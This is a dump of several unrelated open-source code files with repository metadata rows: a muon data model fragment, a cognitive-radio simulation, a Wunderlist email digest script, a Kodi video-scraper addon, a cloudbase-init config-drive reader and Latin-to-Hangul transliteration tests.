self._context = muon_context
def add_muon_data(self, filename, workspace, run):
self._loaded_data_store.add_data(run=run, filename=filename, workspace=workspace)
def clear_data(self):
self._loaded_data_store.clear()
self._context.current_runs = []
def is_filename_loaded(self, filename):
return self._loaded_data_store.contains(filename=filename)
def is_run_loaded(self, run):
return self._loaded_data_store.contains(run=run)
@property
def workspaces(self):
return self._context.current_workspaces
@property
def runs(self):
return self._context.current_runs
@property
def filenames(self):
return self._context.current_filenames
| gpl-3.0 | 1,026,091,008,242,188,000 | 32.622222 | 113 | 0.693985 | false |
maemre/rasim | sim.py | 1 | 10863 | #!/usr/bin/env python
# Holy import!
from __future__ import division
from numpy import *
from matplotlib import pyplot as P
from agent import OptHighestSNR, RandomChannel, IndividualQ, FixChannel
from channel.simple import SimpleChannel
from traffic.simple import SimpleTraffic
from environment import Environment
import os
# simulation parameters:
from params import *
from args import argv
# create data-output directory
output_dir = os.path.join(argv.output_dir, prefix)
try:
os.mkdir(argv.output_dir)
except OSError:
pass
try:
os.mkdir(output_dir)
except OSError:
pass
# generate channel-related stuff
# goodness of channels
goodness = concatenate((ones(N_good_channel), zeros(N_channel - N_good_channel)))
random.shuffle(goodness)
# channel generator
def gen_chan(i):
ch = noise['bad']
if goodness[i]:
ch = noise['good']
return SimpleChannel(base_freq + chan_bw * i, **ch)
def init_state(i):
# disk point picking - http://mathworld.wolfram.com/DiskPointPicking.html
r = sqrt(random.rand())*r_init
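    # sqrt keeps the points uniform over the disk: the radius CDF is
    # P(R <= r) = (r / r_init) ** 2, so r = sqrt(u) * r_init with u ~ U(0, 1)
    # inverts it; using u directly would over-sample the centre.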
theta = random.rand()*2*pi
return {
'state': (random.randint(0, N_channel), random.randint(0, B)),
'x': r*cos(theta),
'y':r*sin(theta),
'id': i,
'speed': 0 if i < N_stationary_agent else 30. / 3.6 * t_slot # 30 kph
}
if argv.agents is None:
print 'No agent type is specified. Simulation cannot run. For details run rasim with "--help" option'
exit(1)
agent_types = []
for i in [RandomChannel, IndividualQ, OptHighestSNR]: # + [FixChannel, OptHighestSNR]
if i.__name__ in argv.agents:
agent_types.append(i)
paths = {}
for a in agent_types:
paths[a] = os.path.join(output_dir, a.__name__)
try:
os.mkdir(paths[a])
except OSError:
pass
# init statistics
avg_energies = zeros([len(agent_types), N_agent, t_total])
en_type = zeros([len(agent_types), t_total])
avg_bits = zeros([len(agent_types), N_agent, t_total])
bits_type = zeros([len(agent_types), t_total], dtype=int_)
en_idle = zeros([len(agent_types), N_agent, t_total])
en_sense = zeros([len(agent_types), N_agent, t_total])
en_sw = zeros([len(agent_types), N_agent, t_total])
en_tx = zeros([len(agent_types), N_agent, t_total])
buf_overflow = zeros([len(agent_types), N_agent, t_total], dtype=int_)
buf_levels = zeros([len(agent_types), N_agent, t_total], dtype=int_)
init_positions = zeros([len(agent_types), N_runs, N_agent, 2])
last_positions = zeros([len(agent_types), N_runs, N_agent, 2])
#############
# Arrays below are reused for each agent type and their values are saved per agent type for
# small memory footprint!!
#############
# Channel traffic record. 0 = no traffic, 1 = PU traffic
channel_traf = zeros([N_channel, N_runs, t_total], dtype=int_)
# Agent transmission record. 0..N_channel-1 = transimt over given channel, N_channel = idle
# a huge matrix indeed
transmissions = zeros([N_runs, N_agent, t_total])
def run_simulation(agent_type, agent_no):
global avg_energies, en_type, avg_bits, bits_type, buf_overflow
# channels themselves
channels = [gen_chan(i) for i in xrange(N_channel)]
# channel traffics
traffics = [SimpleTraffic() for i in xrange(N_channel)]
env = Environment(channels, traffics, pd=0.9, pf=0.1)
if argv.verbose or not batch_run:
print 'Agent type:', agent_type.__name__
for n_run in xrange(N_runs):
# generate agents
agents = [agent_type(env, init_state(i)) for i in xrange(N_agent)]
env.set_agents(agents)
init_positions[agent_no, n_run] = [(a.x, a.y) for a in agents]
energies = zeros([N_agent, t_total])
bits = zeros([N_agent, t_total])
if argv.verbose or not batch_run:
print "Run #%d of %d(agent), %d of %d(total)" % (n_run + 1, N_runs, n_run + agent_no * N_runs + 1, N_runs * len(agent_types))
rates = [0,0,0,0,0]
for t in xrange(t_total):
env.next_slot()
channel_traf[:,n_run,t] = env.t_state
# get actions
actions = [a.act_then_idle() for a in agents]
# collect statistics for buffer overflow and buffer levels
for i, a in enumerate(agents):
buf_overflow[agent_no, i, t] = int(a.buf_overflow)
buf_levels[agent_no, i, t] += B - a.B_empty
# collisions per channel where,
# N_agent: PU collision, (0..N_agent-1): SU collision with ID
# -1: No collision
collisions = [N_agent if traffic else -1 for traffic in env.t_state]
collided = [False] * N_agent
for i, a in enumerate(actions):
if a['action'] == ACTION.TRANSMIT:
if collisions[a['channel']] == N_agent:
# collision with PU, mark agent as collided
collided[i] = True
rates[4] += 1
elif collisions[a['channel']] >= 0:
# collision with SU, mark both agents as collided
collided[i] = collided[collisions[a['channel']]] = True
else:
# no collision *yet*
collisions[a['channel']] = i
transmissions[n_run, i, t] = a['channel']
else:
transmissions[n_run, i, t] = N_channel
# For each agent compute transmission successes and report
# transmission success/failure to agent
for i, a in enumerate(agents):
# collect energy usage statistics
energies[i, t] = a.E_slot
en_type[agent_no, t] += a.E_slot
en_idle[agent_no, i, t] += a.E_idle
en_sense[agent_no, i, t] += a.E_sense
en_tx[agent_no, i, t] += a.E_tx
en_sw[agent_no, i, t] += a.E_sw
act = actions[i]
# send feedback to idle agents too
if act['action'] == ACTION.IDLE:
a.feedback(False, False, idle=True)
                # if collision occurred, report collision
if collided[i]:
a.feedback(collision=True, success=False)
rates[0] += 1
continue
if act['action'] != ACTION.TRANSMIT:
rates[3] += 1
continue
ch = env.channels[act['channel']]
# no collision, check transmission success by channel quality
pkt_sent = ch.transmission_successes(act['power'], act['bitrate'], act['pkt_size'], act['n_pkt'], a.x, a.y)
# give feedback
if pkt_sent == 0:
a.feedback(collision=False, success=False)
else:
a.feedback(collision=False, success=True, N_pkt=pkt_sent)
rates[1] += pkt_sent * 1.0 / act['n_pkt']
rates[2] += act['n_pkt'] - pkt_sent
# collect bit transmission statistics
bits[i, t] = pkt_sent * act['pkt_size']
bits_type[agent_no, t] += pkt_sent * act['pkt_size']
# save energies
#savetxt('energy_%d.txt' % n_run, energies)
# take averages
avg_energies[agent_no] += energies
avg_bits[agent_no] += bits
# print stats
rates[4] = rates[4] / (t_total * N_channel) * 100
if argv.verbose or not batch_run:
print "Collisions: %d\nSuccesses: %f\nLost in Channel: %d\nIdle: %d\n%%PU Collisions: %f" % tuple(rates)
print "%Success:", rates[1]/(t_total*N_agent - rates[3]) * 100
print "%Collided channels:", rates[0]/(t_total*N_channel) * 100
print
last_positions[agent_no, n_run] = [(a.x, a.y) for a in agents]
# save statistics
save(os.path.join(output_dir, agent_type.__name__, 'channel_traf.npy'), channel_traf)
save(os.path.join(output_dir, agent_type.__name__, 'transmissions.npy'), transmissions)
for i, agent_type in enumerate(agent_types):
run_simulation(agent_type, i)
buf_levels /= N_runs
avg_energies /= N_runs
avg_bits /= N_runs
en_idle /= N_runs
en_sense /= N_runs
en_tx /= N_runs
en_sw /= N_runs
# give outputs
if not batch_run:
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(cumsum(en_type[i])/cumsum(bits_type[i]), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('Energy/bit (cumulative)')
P.title('Efficiency (Cumulative Energy/bit) vs Time')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(convolve(buf_overflow[i].sum(axis=0)/(N_agent*1.0), [1./7]*7), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('# of buffer overflows (7-point avg, per agent)')
P.title('Buffer Overflows vs Time')
P.figure()
P.bar(arange(len(agent_types)), buf_overflow.sum(axis=(1,2)))
P.legend()
P.xlabel('Agent Type')
P.ylabel('# of buffer overflows (avg, per agent)')
P.xticks(arange(len(agent_types) + 1), [x.__name__ for x in agent_types] + [''])
P.title('Buffer overflows vs Agent Type')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(buf_levels[i].sum(axis=0)/(N_agent*1.0), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('buffer occupancy')
P.title('Buffer Occupancy (avg) vs Time')
P.figure()
for i, agent_type in enumerate(agent_types):
P.plot(cumsum(en_idle[i].sum(axis=0) / N_agent), label=agent_type.__name__)
P.legend()
P.xlabel('Time (time slots)')
P.ylabel('Avg Idle Energy (cumulative)')
P.title('Idle Energy vs Time')
P.show()
print "Throughput:"
for i, agent_type in enumerate(agent_types):
print "\t%s:\t%f" % (agent_type.__name__, sum(bits_type[i]))
# save statistics
# save agent types
with open(os.path.join(output_dir, 'agents.txt'), 'w') as f:
f.write('\n'.join(x.__name__ for x in agent_types))
save(os.path.join(output_dir, 'avg_energies.npy'), avg_energies)
save(os.path.join(output_dir, 'avg_bits.npy'), avg_bits)
save(os.path.join(output_dir, 'en_idle.npy'), en_idle)
save(os.path.join(output_dir, 'en_sense.npy'), en_sense)
save(os.path.join(output_dir, 'en_tx.npy'), en_tx)
save(os.path.join(output_dir, 'en_sw.npy'), en_sw)
save(os.path.join(output_dir, 'en_type.npy'), en_type)
save(os.path.join(output_dir, 'buf_overflow.npy'), buf_overflow)
save(os.path.join(output_dir, 'buf_levels.npy'), buf_overflow)
save(os.path.join(output_dir, 'init_positions.npy'), init_positions)
save(os.path.join(output_dir, 'last_positions.npy'), last_positions) | apache-2.0 | 5,194,816,224,260,189,000 | 38.220217 | 137 | 0.58308 | false |
AyeJayTwo/DailyWunderlist | wunderlist.py | 1 | 4315 | import requests
import json
from datetime import date
from datetime import datetime
from datetime import timedelta
#Application Details
# with open('config.json') as json_file:
# config_data = json.load(json_file)
# client_id = config_data['client_id']
# redirect_uri = config_data['redirect_uri']
# client_secret = config_data['client_secret']
# state = config_data['state']
# code = config_data['code']
# token = config_data['token']
# mailgun_api = config_data['mailgun_api']
# mailgun_key = config_data['mailgun_key']
# to_name = config_data['to_name']
# to_email = config_data['to_email']
def parse_auth_obj(filename):
with open(filename) as json_file:
config_data = json.load(json_file)
return config_data
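# Expected shape of config.json, inferred from the keys read further down in
# this script (all values here are placeholders, not real credentials):
# {
#     "client_id": "...", "client_secret": "...", "code": "...", "state": "...",
#     "redirect_uri": "https://example.invalid/callback", "token": "...",
#     "mailgun_api": "example.mailgun.org", "mailgun_key": "key-...",
#     "to_name": "Jane Doe", "to_email": "jane@example.invalid"
# }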
def get_wunderlists(config):
list_request = {'client_id':config['client_id'],
'client_secret':config['client_secret'],
'code':config['code'],
'grant_type': 'authorization_code',
'redirect_uri':config['redirect_uri'],
'access_token':config['token']}
wunderlists = requests.get("https://a.wunderlist.com/api/v1/lists", params = list_request)
wunderlist_lists = wunderlists.json()
return wunderlist_lists
def sendEmail(config, text):
	return requests.post(
		'https://api.mailgun.net/v3/'+config['mailgun_api']+'/messages',
		auth=("api", config['mailgun_key']),
		data={"from": 'Daily Wunderlist Email <mailgun@'+config['mailgun_api']+'>',
			"to": [config['to_name'], config['to_email']],
			"subject": 'Your Daily Wunderlist Digest %s'%todayDatePrint(),
			"text": text, "html":text})
def get_tasks(list_id, config):
config['list'] = list_id
task_request = {'client_id':config['client_id'],
'client_secret':config['client_secret'],
'code':config['code'],
'grant_type': 'authorization_code',
'redirect_uri':config['redirect_uri'],
'access_token':config['token'],
'list_id':config['list']}
tasks = requests.get("https://a.wunderlist.com/api/v1/tasks", params = task_request)
return tasks.json()
def convertDate(old_date):
year = old_date[0:4]
month = old_date[5:7]
day = old_date[8:10]
return date(int(year),int(month),int(day))
def todayDatePrint():
now = datetime.now()
return str(now.month)+'/'+str(now.day)+'/'+str(now.year)
def todayDate():
now = datetime.now()
return date(now.year, now.month, now.day)
def generateEmail(config):
list_dict = {}
text = '<html>'
# Pull List name + id from API
mylist = get_wunderlists(config)
for i in range(0,len(mylist)):
list_dict[mylist[i]['title']]=mylist[i]['id']
LateTasks = ["Late Tasks"]
TodayTasks = ["Today's Tasks"]
FutureTasks = ['Upcoming Agenda']
for each in list_dict:
list_tasks = get_tasks(list_dict[each], config)
for j in range(0,len(list_tasks)):
if 'due_date' in list_tasks[j]:
task_date = convertDate(list_tasks[j]['due_date'])
# print "Analyzing Task: ", list_tasks[j]['title'], list_tasks[j]['due_date']
if task_date < todayDate():
# print list_tasks[j]['title'], "Task Late!"
LateTasks.append([each, list_tasks[j]['title'], list_tasks[j]['due_date']])
# print "Added Late Task"
elif task_date == todayDate():
# print list_tasks[j]['title'], "Task Due Today"
TodayTasks.append([each, list_tasks[j]['title'], list_tasks[j]['due_date']])
# print "Added Today Task"
elif (task_date - todayDate()) < timedelta(3):
# print list_tasks[j]['title'], "Task in Future"
FutureTasks.append([each, list_tasks[j]['title'], list_tasks[j]['due_date']])
# print "Added Future Task"
for each in (LateTasks, TodayTasks, FutureTasks):
text+='<H2>'+each[0]+'</H2>'
# print each[0]
# print "Number of Tasks: ", len(each)
if len(each) > 1:text+='<h3>'+each[1][0]+'</h3>'
for i in range(1,len(each)):
if i > 1:
if each[i][0] == each[i-1][0]:
text+='<li>'+each[i][1]+'</li>'
else:
text+='<h3>'+each[i][0]+'</h3>'
text+='<li>'+each[i][1]+'</li>'
else:
text+='<li>'+each[i][1]+'</li>'
text+='</HTML>'
text_file = open('TEST_EMAIL.html', 'w')
text_file.write(text)
text_file.close()
return text
##Run the program for each config file
for each in ['config.json','sneha_config.json']:
config_data = parse_auth_obj(each)
email_result = generateEmail(config_data)
sendEmail(config_data, email_result) | mit | -7,650,789,133,617,430,000 | 31.208955 | 91 | 0.644496 | false |
alfa-jor/addon | plugin.video.alfa/channels/sxyprn.py | 1 | 6787 | # -*- coding: utf-8 -*-
#------------------------------------------------------------
import urlparse,re
from platformcode import config, logger
from core import scrapertools
from core.item import Item
from core import servertools
from core import httptools
host = 'https://www.sxyprn.com'
def mainlist(item):
logger.info()
itemlist = []
itemlist.append( Item(channel=item.channel, title="Nuevos" , action="lista", url=host + "/blog/all/0.html?fl=all&sm=latest"))
itemlist.append( Item(channel=item.channel, title="Mas vistos" , action="lista", url=host + "/popular/top-viewed.html"))
itemlist.append( Item(channel=item.channel, title="Mejor valorada" , action="lista", url=host + "/popular/top-rated.html"))
itemlist.append( Item(channel=item.channel, title="Sitios" , action="categorias", url=host))
itemlist.append( Item(channel=item.channel, title="Categorias" , action="categorias", url=host))
itemlist.append( Item(channel=item.channel, title="Buscar", action="search"))
return itemlist
def search(item, texto):
logger.info()
texto = texto.replace(" ", "-")
item.url = host + "/%s.html" % texto
try:
return lista(item)
except:
import sys
for line in sys.exc_info():
logger.error("%s" % line)
return []
def categorias(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t| |<br>|<br/>", "", data)
if "Sitios" in item.title:
patron = "<a href='([^']+)' target='_blank'><div class='top_sub_el top_sub_el_sc'>.*?"
patron += "<span class='top_sub_el_key_sc'>([^<]+)</span>"
patron += "<span class='top_sub_el_count'>(\d+)</span>"
else:
patron = "<a class='tdn' href='([^']+)'.*?"
patron += "<span class='htag_el_tag'>([^<]+)</span>"
patron += "<span class='htag_el_count'>(\d+) videos</span>"
matches = re.compile(patron,re.DOTALL).findall(data)
for scrapedurl,scrapedtitle,cantidad in matches:
scrapedplot = ""
scrapedthumbnail = ""
scrapedurl = urlparse.urljoin(item.url,scrapedurl)
title = scrapedtitle + " (" + cantidad + ")"
itemlist.append( Item(channel=item.channel, action="lista", title=title, url=scrapedurl,
thumbnail=scrapedthumbnail , plot=scrapedplot) )
return itemlist
def lista(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t| |<br>|<br/>", "", data)
patron = "<img class=.*?"
patron += " src='([^']+)'.*?"
patron += "<span class='duration_small'.*?'>([^<]+)<.*?"
patron += "<span class='shd_small'.*?>([^<]+)<.*?"
patron += "post_time' href='([^']+)' title='([^']+)'"
matches = re.compile(patron,re.DOTALL).findall(data)
for scrapedthumbnail,scrapedtime,quality,scrapedurl,scrapedtitle in matches:
title = "[COLOR yellow]%s[/COLOR] [COLOR red]%s[/COLOR] %s" % (scrapedtime,quality,scrapedtitle)
thumbnail = "https:" + scrapedthumbnail
scrapedurl = urlparse.urljoin(item.url,scrapedurl)
plot = ""
itemlist.append( Item(channel=item.channel, action="play", title=title, url=scrapedurl,
thumbnail=thumbnail, fanart=thumbnail, plot=plot, contentTitle = scrapedtitle))
#
next_page = scrapertools.find_single_match(data, "<div class='ctrl_el ctrl_sel'>.*?<a href='([^']+)'")
if next_page:
next_page = urlparse.urljoin(item.url,next_page)
itemlist.append( Item(channel=item.channel, action="lista", title="Página Siguiente >>", text_color="blue",
url=next_page) )
return itemlist
# Scratch notes on the stream URL rewriting (data-vnfo -> /cdn8/ -> trafficdeposit),
# kept as comments so the module stays importable:
# 130
# https://www.sxyprn.com/cdn8/c9/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/65xbtac5i3dbd568c4r9z4575at/g5fd37a74djew1zev21dm176g86.vid
# data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/e1y9b3mzc1o101lzg5q2cze1j390h\/kK-CN4l73_EeBhkoYNYA2A\/1568228437\/65xbtac5i3dbd568c4r9z4575at\/g5fd37a74djew1zev21dm176g86.vid
# -114
# data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/m1v963ez51m1u11za5u2xz41e3806\/BQFIcJlTMr0-Z1gVUTxgaQ\/1568228604\/je54bwaz5r3xbn5a864k91487sa\/o5sd17r7xdaea1be32xd41b6b8z.vid
# https://www.sxyprn.com/cdn8/c9/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/je54bwaz5r3xbn5a864k91487sa/o5sd17r7xdaea1be32xd41b6b8z.vid
# -137
# data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/5v1n993kzs1n1f1ozc5b20zg1o350\/NCnvDdBfOQmJOivEflNSww\/1568229437\/05pbja75c39br5m8q41974z7haf\/v85edl7b76diej12eb2wd7136v8.vid
# https://www.sxyprn.com/cdn8/c9/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/05pbja75c39br5m8q41974z7haf/v85edl7b76diej12eb2wd7136v8.vid
# -106
# data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/41v9b3nzc1q1615zr5n2szw153905\/9LeO2lux-GrgOaEPfMONcA\/1568230473\/1d52b3aa5s36bt5d8o4a9m427pa\/zh5sdc7k7ndee11qe42sdz1h6j8.vid
# https://www.sxyprn.com/cdn8/c9/41v9b3nzc1q1615zr5n2szw153905/9LeO2lux-GrgOaEPfMONcA/1568230367/1d52b3aa5s36bt5d8o4a9m427pa/zh5sdc7k7ndee11qe42sdz1h6j8.vid
# https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/5ba53b584947a/5d77de1e2d168.vid
# https://c9.trafficdeposit.com/vidi/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/5ba53b584947a/5d77de1e2d168.vid
# 193111152130
# https://c9.trafficdeposit.com/vidi/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid
# https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid
def play(item):
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|amp;|\s{2}| ", "", data)
url = scrapertools.find_single_match(data, 'data-vnfo=.*?":"([^"]+)"')
url = url.replace("\/", "/").replace("/cdn/", "/cdn8/")
url = urlparse.urljoin(item.url,url)
itemlist = servertools.find_video_items(item.clone(url = url, contentTitle = item.title))
# itemlist.append( Item(channel=item.channel, action="play",server=directo, title = item.title, url=url))
return itemlist
| gpl-3.0 | 4,249,873,821,578,241,500 | 55.082645 | 167 | 0.620395 | false |
cmin764/cloudbase-init | cloudbaseinit/metadata/services/osconfigdrive/windows.py | 1 | 8485 | # Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
import shutil
import struct
import tempfile
import uuid
from oslo_config import cfg
from oslo_log import log as oslo_logging
from cloudbaseinit import exception
from cloudbaseinit.metadata.services.osconfigdrive import base
from cloudbaseinit.osutils import factory as osutils_factory
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import vfat
opts = [
cfg.StrOpt('bsdtar_path', default='bsdtar.exe',
help='Path to "bsdtar", used to extract ISO ConfigDrive '
'files'),
]
CONF = cfg.CONF
CONF.register_opts(opts)
LOG = oslo_logging.getLogger(__name__)
CONFIG_DRIVE_LABEL = 'config-2'
MAX_SECTOR_SIZE = 4096
# Absolute offset values and the ISO magic string.
OFFSET_BOOT_RECORD = 0x8000
OFFSET_ISO_ID = OFFSET_BOOT_RECORD + 1
ISO_ID = b'CD001'
# Little-endian unsigned short size values.
OFFSET_VOLUME_SIZE = OFFSET_BOOT_RECORD + 80
OFFSET_BLOCK_SIZE = OFFSET_BOOT_RECORD + 128
PEEK_SIZE = 2
class WindowsConfigDriveManager(base.BaseConfigDriveManager):
def __init__(self):
super(WindowsConfigDriveManager, self).__init__()
self._osutils = osutils_factory.get_os_utils()
def _check_for_config_drive(self, drive):
label = self._osutils.get_volume_label(drive)
if label and label.lower() == CONFIG_DRIVE_LABEL and \
os.path.exists(os.path.join(drive,
'openstack\\latest\\'
'meta_data.json')):
LOG.info('Config Drive found on %s', drive)
return True
return False
def _get_iso_file_size(self, device):
if not device.fixed:
return None
if not device.size > (OFFSET_BLOCK_SIZE + PEEK_SIZE):
return None
off = device.seek(OFFSET_ISO_ID)
magic = device.read(len(ISO_ID), skip=OFFSET_ISO_ID - off)
if ISO_ID != magic:
return None
off = device.seek(OFFSET_VOLUME_SIZE)
volume_size_bytes = device.read(PEEK_SIZE,
skip=OFFSET_VOLUME_SIZE - off)
off = device.seek(OFFSET_BLOCK_SIZE)
block_size_bytes = device.read(PEEK_SIZE,
skip=OFFSET_BLOCK_SIZE - off)
volume_size = struct.unpack("<H", volume_size_bytes)[0]
block_size = struct.unpack("<H", block_size_bytes)[0]
return volume_size * block_size
def _write_iso_file(self, device, iso_file_path, iso_file_size):
with open(iso_file_path, 'wb') as stream:
offset = 0
# Read multiples of the sector size bytes
# until the entire ISO content is written.
while offset < iso_file_size:
real_offset = device.seek(offset)
bytes_to_read = min(MAX_SECTOR_SIZE, iso_file_size - offset)
data = device.read(bytes_to_read, skip=offset - real_offset)
stream.write(data)
offset += bytes_to_read
def _extract_files_from_iso(self, iso_file_path):
args = [CONF.bsdtar_path, '-xf', iso_file_path,
'-C', self.target_path]
(out, err, exit_code) = self._osutils.execute_process(args, False)
if exit_code:
raise exception.CloudbaseInitException(
'Failed to execute "bsdtar" from path "%(bsdtar_path)s" with '
'exit code: %(exit_code)s\n%(out)s\n%(err)s' % {
'bsdtar_path': CONF.bsdtar_path,
'exit_code': exit_code,
'out': out, 'err': err})
def _extract_iso_from_devices(self, devices):
"""Search across multiple devices for a raw ISO."""
extracted = False
iso_file_path = os.path.join(tempfile.gettempdir(),
str(uuid.uuid4()) + '.iso')
for device in devices:
try:
with device:
iso_file_size = self._get_iso_file_size(device)
if iso_file_size:
LOG.info('ISO9660 disk found on %s', device)
self._write_iso_file(device, iso_file_path,
iso_file_size)
self._extract_files_from_iso(iso_file_path)
extracted = True
break
except Exception as exc:
LOG.warning('ISO extraction failed on %(device)s with '
'%(error)r', {"device": device, "error": exc})
if os.path.isfile(iso_file_path):
os.remove(iso_file_path)
return extracted
def _get_config_drive_from_cdrom_drive(self):
for drive_letter in self._osutils.get_cdrom_drives():
if self._check_for_config_drive(drive_letter):
os.rmdir(self.target_path)
shutil.copytree(drive_letter, self.target_path)
return True
return False
def _get_config_drive_from_raw_hdd(self):
disks = map(disk.Disk, self._osutils.get_physical_disks())
return self._extract_iso_from_devices(disks)
def _get_config_drive_from_vfat(self):
for drive_path in self._osutils.get_physical_disks():
if vfat.is_vfat_drive(self._osutils, drive_path):
LOG.info('Config Drive found on disk %r', drive_path)
vfat.copy_from_vfat_drive(self._osutils, drive_path,
self.target_path)
return True
return False
def _get_config_drive_from_partition(self):
for disk_path in self._osutils.get_physical_disks():
physical_drive = disk.Disk(disk_path)
with physical_drive:
partitions = physical_drive.partitions()
extracted = self._extract_iso_from_devices(partitions)
if extracted:
return True
return False
def _get_config_drive_from_volume(self):
"""Look through all the volumes for config drive."""
volumes = self._osutils.get_volumes()
for volume in volumes:
if self._check_for_config_drive(volume):
os.rmdir(self.target_path)
shutil.copytree(volume, self.target_path)
return True
return False
def _get_config_drive_files(self, cd_type, cd_location):
get_config_drive = self.config_drive_type_location.get(
"{}_{}".format(cd_location, cd_type))
if get_config_drive:
return get_config_drive()
else:
LOG.debug("Irrelevant type %(type)s in %(location)s location; "
"skip",
{"type": cd_type, "location": cd_location})
return False
def get_config_drive_files(self, searched_types=None,
searched_locations=None):
searched_types = searched_types or []
searched_locations = searched_locations or []
for cd_type, cd_location in itertools.product(searched_types,
searched_locations):
LOG.debug('Looking for Config Drive %(type)s in %(location)s',
{"type": cd_type, "location": cd_location})
if self._get_config_drive_files(cd_type, cd_location):
return True
return False
@property
def config_drive_type_location(self):
return {
"cdrom_iso": self._get_config_drive_from_cdrom_drive,
"hdd_iso": self._get_config_drive_from_raw_hdd,
"hdd_vfat": self._get_config_drive_from_vfat,
"partition_iso": self._get_config_drive_from_partition,
"partition_vfat": self._get_config_drive_from_volume,
}
| apache-2.0 | -5,127,092,252,806,962,000 | 37.568182 | 78 | 0.576429 | false |
Jinwithyoo/han | tests/lat.py | 1 | 10678 | # -*- coding: utf-8 -*-
from tests import HangulizeTestCase
from hangulize.langs.lat import Latin
class LatinTestCase(HangulizeTestCase):
lang = Latin()
def test_people_roman(self):
self.assert_examples({
'Flavius Aëtius': '플라비우스 아에티우스',
'FLAVIVS AËTIVS': '플라비우스 아에티우스',
'Gnaeus Julius Agricola': '그나이우스 율리우스 아그리콜라',
'GNAEUS IVLIVS AGRICOLA': '그나이우스 율리우스 아그리콜라',
'Marcus Vipsanius Agrippa': '마르쿠스 빕사니우스 아그리파',
'MARCVS VIPSANIVS AGRIPPA': '마르쿠스 빕사니우스 아그리파',
'Julia Augusta Agrippina': '율리아 아우구스타 아그리피나',
'IVLIA AVGVSTA AGRIPPINA': '율리아 아우구스타 아그리피나',
'Marcus Antonius': '마르쿠스 안토니우스',
'MARCVS ANTONIVS': '마르쿠스 안토니우스',
'Apuleius': '아풀레이우스',
'APVLEIVS': '아풀레이우스',
'Gaius Julius Caesar Augustus': \
'가이우스 율리우스 카이사르 아우구스투스',
'GAIVS IVLIVS CAESAR AVGVSTVS': \
'가이우스 율리우스 카이사르 아우구스투스',
'Gaius Julius Caesar': '가이우스 율리우스 카이사르',
'GAIVS IVLIVS CAESAR': '가이우스 율리우스 카이사르',
'Gaius Valerius Catullus': '가이우스 발레리우스 카툴루스',
'GAIVS VALERIVS CATVLLVS': '가이우스 발레리우스 카툴루스',
'Marcus Tullius Cicero': '마르쿠스 툴리우스 키케로',
'MARCVS TVLLIVS CICERO': '마르쿠스 툴리우스 키케로',
'Tiberius Claudius Caesar Augustus Germanicus': \
'티베리우스 클라우디우스 카이사르 아우구스투스 게르마니쿠스',
'TIBERIVS CLAVDIVS CAESAR AVGVSTVS GERMANICVS': \
'티베리우스 클라우디우스 카이사르 아우구스투스 게르마니쿠스',
'Lucius Aurelius Commodus Antoninus': \
'루키우스 아우렐리우스 콤모두스 안토니누스',
'LVCIVS AVRELIVS COMMODVS ANTONINVS': \
'루키우스 아우렐리우스 콤모두스 안토니누스',
'Flavius Valerius Aurelius Constantinus': \
'플라비우스 발레리우스 아우렐리우스 콘스탄티누스',
'FLAVIVS VALERIVS AVRELIVS CONSTANTINVS': \
'플라비우스 발레리우스 아우렐리우스 콘스탄티누스',
'Cornelia Scipionis Africana': \
'코르넬리아 스키피오니스 아프리카나',
'CORNELIA SCIPIONIS AFRICANA': \
'코르넬리아 스키피오니스 아프리카나',
'Marcus Licinius Crassus': '마르쿠스 리키니우스 크라수스',
'MARCVS LICINIVS CRASSVS': '마르쿠스 리키니우스 크라수스',
'Gaius Aurelius Valerius Diocletianus': \
'가이우스 아우렐리우스 발레리우스 디오클레티아누스',
'GAIVS AVRELIVS VALERIVS DIOCLETIANVS': \
'가이우스 아우렐리우스 발레리우스 디오클레티아누스',
'Publius Aelius Hadrianus': '푸블리우스 아일리우스 하드리아누스',
'PVBLIVS AELIVS HADRIANVS': '푸블리우스 아일리우스 하드리아누스',
'Quintus Horatius Flaccus': '퀸투스 호라티우스 플라쿠스',
'QVINTVS HORATIVS FLACCVS': '퀸투스 호라티우스 플라쿠스',
'Flavius Petrus Sabbatius Justinianus': \
'플라비우스 페트루스 사바티우스 유스티니아누스',
'FLAVIVS PETRVS SABBATIVS IVSTINIANVS': \
'플라비우스 페트루스 사바티우스 유스티니아누스',
'Titus Livius': '티투스 리비우스',
'TITVS LIVIVS': '티투스 리비우스',
'Gaius Marius': '가이우스 마리우스',
'GAIVS MARIVS': '가이우스 마리우스',
